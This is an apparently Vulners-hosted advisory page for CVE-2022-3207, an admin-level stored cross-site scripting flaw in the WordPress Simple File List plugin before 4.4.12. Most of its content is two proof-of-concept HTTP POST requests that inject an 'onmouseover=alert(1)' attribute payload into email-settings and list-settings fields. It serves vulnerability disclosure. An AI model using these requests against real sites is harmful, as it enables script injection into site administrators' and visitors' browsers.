Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting. First XSS on email settings and second XSS on list settings
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | CVE-2022-3207 Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting | 10 Oct 202200:00 | – | cvelist |
![]() | WordPress Simple File List plugin <= 4.4.11 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability | 19 Sep 202200:00 | – | patchstack |
![]() | Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting | 19 Sep 202200:00 | – | wpvulndb |
![]() | WordPress Simple File List Cross-Site Scripting Vulnerability | 12 Oct 202200:00 | – | cnvd |
![]() | CVE-2022-3207 | 10 Oct 202221:15 | – | nvd |
![]() | CVE-2022-3207 | 10 Oct 202221:15 | – | cve |
![]() | Cross site scripting | 10 Oct 202221:15 | – | prion |
# First Stored XSS - HTTP Request
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
...
...
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE
+++++++++++++++++++++++
# Second Stored XSS - HTTP Request
POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
...
...
eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo